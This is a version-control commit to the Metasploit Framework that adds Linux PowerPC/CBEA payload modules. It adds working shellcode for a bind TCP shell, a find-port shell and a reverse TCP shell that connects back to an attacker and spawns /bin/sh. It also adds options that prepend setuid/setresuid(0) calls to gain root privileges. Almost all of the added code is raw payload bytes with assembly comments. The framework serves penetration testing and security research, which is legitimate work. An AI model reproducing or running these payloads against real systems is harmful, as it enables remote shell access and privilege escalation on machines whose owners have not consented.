Added Linux Power/Cell Broadband Engine Architecture payload modules and advanced payload options

git-svn-id: file:///home/svn/framework3/trunk@5899 4d416f70-5f16-0410-b530-b9f4589650da

Author: Ramon de C Valle

lib/msf/core/payload/linux.rb

@@ -106,8 +106,52 @@ def generate(*args)
 
 		end
 
+		# Handle all Power/CBEA code here
+		if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
+
+			# Prepend
+
+			if (datastore['PrependSetresuid'])
+				# setresuid(0, 0, 0)
+				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\xa5\x2a\x78"     +#   xor     r5,r5,r5                   #
+				       "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\xa5"     +#   addi    r0,r31,-347                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
+			if (datastore['PrependSetreuid'])
+				# setreuid(0, 0)
+				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\x47"     +#   addi    r0,r31,-441                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
+			if (datastore['PrependSetuid'])
+				# setuid(0)
+				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\x18"     +#   addi    r0,r31,-488                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
+			# Append
+
+			if (datastore['AppendExit'])
+				# exit(0)
+				app << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\x02"     +#   addi    r0,r31,-510                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
+		end
+
 		return (pre + buf + app)
 	end
 
 
-end
+end

modules/payloads/singles/linux/ppc/shell_bind_tcp.rb

@@ -0,0 +1,100 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Bind TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection and spawn a command shell',
+			'Author'        => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => [ ARCH_PPC, ARCH_CBEA ],
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LPORT'    => [ 58, 'n' ],
+						},
+					'Payload' =>
+						"\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
+						"\x3b\xa0\x01\xff"     +#   li      r29,511                    #
+						"\x3b\x9d\xfe\x02"     +#   addi    r28,r29,-510               #
+						"\x3b\x7d\xfe\x03"     +#   addi    r27,r29,-509               #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x97\x81\xff\xfc"     +#   stwu    r28,-4(r1)                 #
+						"\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x02"     +#   addi    r3,r29,-510                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
+						"\x3b\x3d\xfe\x11"     +#   addi    r25,r29,-495               #
+						"\x3e\xe0\xff\x02"     +#   lis     r23,-254                   #
+						"\x62\xf7\x04\xd2"     +#   ori     r23,r23,1234               #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x96\xe1\xff\xfc"     +#   stwu    r23,-4(r1)                 #
+						"\x7c\x36\x0b\x78"     +#   mr      r22,r1                     #
+						"\x97\x21\xff\xfc"     +#   stwu    r25,-4(r1)                 #
+						"\x96\xc1\xff\xfc"     +#   stwu    r22,-4(r1)                 #
+						"\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x03"     +#   addi    r3,r29,-509                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x05"     +#   addi    r3,r29,-507                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x06"     +#   addi    r3,r29,-506                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x7c\x75\x1b\x78"     +#   mr      r21,r3                     #
+						"\x7f\x64\xdb\x78"     +#   mr      r4,r27                     #
+						"\x7e\xa3\xab\x78"     +#   mr      r3,r21                     #
+						"\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x37\x7b\xff\xff"     +#   addic.  r27,r27,-1                 #
+						"\x40\x80\xff\xec"     +#   bge+    <bndsockcode+148>          #
+						"\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
+						"\x40\x82\xff\xfd"     +#   bnel+   <bndsockcode+172>          #
+						"\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
+						"\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
+						"\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
+						"\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
+						"\x94\xa1\xff\xfc"     +#   stwu    r5,-4(r1)                  #
+						"\x94\x61\xff\xfc"     +#   stwu    r3,-4(r1)                  #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"/bin/sh"
+				}
+			))
+	end
+
+end

modules/payloads/singles/linux/ppc/shell_find_port.rb

@@ -0,0 +1,87 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/find_port'
+require 'msf/base/sessions/command_shell'
+
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Find Port Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Spawn a shell on an established connection',
+			'Author'        => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => [ ARCH_PPC, ARCH_CBEA ],
+			'Handler'       => Msf::Handler::FindPort,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'CPORT' => [ 86, 'n' ],
+						},
+					'Payload' =>
+						"\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
+						"\x3b\xa0\x01\xff"     +#   li      r29,511                    #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x7c\x3c\x0b\x78"     +#   mr      r28,r1                     #
+						"\x3b\x7d\xfe\x11"     +#   addi    r27,r29,-495               #
+						"\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
+						"\x7c\x3a\x0b\x78"     +#   mr      r26,r1                     #
+						"\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
+						"\x97\x81\xff\xfc"     +#   stwu    r28,-4(r1)                 #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x3b\xff\x01\xff"     +#   addi    r31,r31,511                #
+						"\x3b\xff\xfe\x02"     +#   addi    r31,r31,-510               #
+						"\x38\x21\x01\xff"     +#   addi    r1,r1,511                  #
+						"\x38\x21\xfe\x05"     +#   addi    r1,r1,-507                 #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x08"     +#   addi    r3,r29,-504                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x3b\x3c\x01\xff"     +#   addi    r25,r28,511                #
+						"\xa3\x39\xfe\x03"     +#   lhz     r25,-509(r25)              #
+						"\x28\x19\x04\xd2"     +#   cmplwi  r25,1234                   #
+						"\x40\x82\xff\xd0"     +#   bne+    <fndsockcode+40>           #
+						"\x3b\x1d\xfe\x03"     +#   addi    r24,r29,-509               #
+						"\x7f\x04\xc3\x78"     +#   mr      r4,r24                     #
+						"\x7f\xe3\xfb\x78"     +#   mr      r3,r31                     #
+						"\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x37\x18\xff\xff"     +#   addic.  r24,r24,-1                 #
+						"\x40\x80\xff\xec"     +#   bge+    <fndsockcode+96>           #
+						"\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
+						"\x40\x82\xff\xfd"     +#   bnel+   <fndsockcode+120>          #
+						"\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
+						"\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
+						"\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
+						"\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
+						"\x94\xa1\xff\xfc"     +#   stwu    r5,-4(r1)                  #
+						"\x94\x61\xff\xfc"     +#   stwu    r3,-4(r1)                  #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"/bin/sh"
+				}
+			))
+	end
+
+end

modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb

@@ -0,0 +1,91 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Reverse TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to attacker and spawn a command shell',
+			'Author'        => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => [ ARCH_PPC, ARCH_CBEA ],
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LHOST'    => [ [ 54, 58 ], 'ADDR16MSB' ],
+							'LPORT'    => [ 62, 'n' ],
+						},
+					'Payload' =>
+						"\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
+						"\x3b\xa0\x01\xff"     +#   li      r29,511                    #
+						"\x3b\x9d\xfe\x02"     +#   addi    r28,r29,-510               #
+						"\x3b\x7d\xfe\x03"     +#   addi    r27,r29,-509               #
+						"\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
+						"\x97\x81\xff\xfc"     +#   stwu    r28,-4(r1)                 #
+						"\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x02"     +#   addi    r3,r29,-510                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
+						"\x3b\x3d\xfe\x11"     +#   addi    r25,r29,-495               #
+						"\x3e\xe0\x7f\x00"     +#   lis     r23,32512                  #
+						"\x62\xf7\x00\x01"     +#   ori     r23,r23,1                  #
+						"\x3a\xc0\x04\xd2"     +#   li      r22,1234                   #
+						"\x96\xe1\xff\xfc"     +#   stwu    r23,-4(r1)                 #
+						"\x96\xc1\xff\xfc"     +#   stwu    r22,-4(r1)                 #
+						"\x93\x61\xff\xfe"     +#   stw     r27,-2(r1)                 #
+						"\x7c\x35\x0b\x78"     +#   mr      r21,r1                     #
+						"\x97\x21\xff\xfc"     +#   stwu    r25,-4(r1)                 #
+						"\x96\xa1\xff\xfc"     +#   stwu    r21,-4(r1)                 #
+						"\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x7d\xfe\x04"     +#   addi    r3,r29,-508                #
+						"\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x7f\x64\xdb\x78"     +#   mr      r4,r27                     #
+						"\x7f\x43\xd3\x78"     +#   mr      r3,r26                     #
+						"\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"\x37\x7b\xff\xff"     +#   addic.  r27,r27,-1                 #
+						"\x40\x80\xff\xec"     +#   bge+    <cntsockcode+108>          #
+						"\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
+						"\x40\x82\xff\xfd"     +#   bnel+   <cntsockcode+132>          #
+						"\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
+						"\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
+						"\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
+						"\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
+						"\x94\xa1\xff\xfc"     +#   stwu    r5,-4(r1)                  #
+						"\x94\x61\xff\xfc"     +#   stwu    r3,-4(r1)                  #
+						"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+						"\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
+						"\x44\xff\xff\x02"     +#   sc                                 #
+						"/bin/sh"
+				}
+			))
+	end
+
+end